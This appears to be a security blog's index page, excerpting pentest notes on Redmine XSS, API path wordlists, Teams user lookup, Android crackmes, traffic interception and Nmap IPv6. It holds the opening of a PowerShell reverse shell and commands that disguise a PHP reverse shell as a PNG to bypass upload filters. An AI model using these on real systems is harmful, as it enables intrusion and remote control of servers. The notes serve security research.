Techbrunch

Redmine Security

Advisories: https://www.redmine.org/projects/redmine/wiki/Security_Advisories

Let's find a POC for the following vulns:

• Persistent XSS vulnerabilities in textile inline links (#32934)
• XSS vulnerability due to missing back_url validation (#32850)

Both issues were fixed in 4.1.1 and 4.0.7.

Techbrunch

/*
/{*}
/1.0/domains
/1.0/records
/1.0/records/3
/1.0/token
/123456/domains
/123456/domains/112233/records
/123/records/
/1/admin/msg/del

Techbrunch

Google
Microsoft
Forcepoint
Mimecast
ZSCALER
Fortinet
Amazon
PALO ALTO
RIPE
McAfee

Techbrunch

$socket = new-object System.Net.Sockets.TcpClient('127.0.0.1', 413);
if($socket -eq $null){exit 1}
$stream = $socket.GetStream();
$writer = new-object System.IO.StreamWriter($stream);
$buffer = new-object System.Byte[] 1024;
$encoding = new-object System.Text.AsciiEncoding;
do
{
	$writer.Flush();
	$read = $null;

Techbrunch

Presence is part of a user's profile in Microsoft Teams (and throughout Office 365) that indicates the user's current availability and status to other users. By default, anyone in your organization using Teams can see (in nearly real time) if other users are available online.

Teams presence in Outlook is supported on the Outlook 2013 desktop app and later.

Source: https://docs.microsoft.com/en-us/microsoftteams/presence-admins

Request:

GET /api/mt/emea/beta/users/first.last@example.com/externalsearch HTTP/1.1
Host: teams.microsoft.com

Techbrunch

Source: https://github.com/OWASP/owasp-mstg/tree/master/Crackmes

Let's try running the app.

adb install UnCrackable-Level1.apk

When we open the app we directly get an error:

Techbrunch

# The magic bytes for PNG
echo '89 50 4E 47 0D 0A 1A 0A' | xxd -p -r >> reverse.php.png
cat reverse.php >> reverse.php.png

Techbrunch

Notes:

• Application does not consume system proxy configuration -> Solution: Modify /etc/hosts to redirect inbound requests (Burp)
• On Android the AOT Compilation option requires an Enterprise license or higher, is available only when the project is configured for Release mode, and it is disabled by default.(Source)

Regarding the interception of HTTP:

• https://docs.microsoft.com/en-us/xamarin/android/app-fundamentals/http-stack?tabs=macos

We did it through USB reverse tunneling and iptable rules local to the phone.

Techbrunch

Nmap IPV6 Scanning: https://nmap.org/book/port-scanning-ipv6.html

While IPv6 hasn't exactly taken the world by storm, it gets significant use in some countries and most modern operating systems support it. To use Nmap with IPv6, both the source and target of your scan must be configured for IPv6. If your ISP (like most of them) does not allocate IPv6 addresses to you, free tunnel brokers are widely available and work fine with Nmap. I use the free IPv6 tunnel broker service at http://www.tunnelbroker.net. Other tunnel brokers are listed at Wikipedia. 6to4 tunnels are another popular, free approach.

On AWS, enable IPV6 on the VPC, make sure to add an Internet Gateway with routes to the Internet in the route tables (0.0.0.0/0 and ::/0).

Source: https://docs.aws.amazon.com/vpc/latest/userguide/VPC_Internet_Gateway.html

You should now be able to scan IPV6 address:

Techbrunch

Image: https://nahamsec.net/Nahamsec_CTF_Giveaway.jpg

No usefull metadata:

date:create: 2020-01-12T11:09:18+00:00
date:modify: 2020-01-07T00:53:58+00:00

Domain nahamsec.net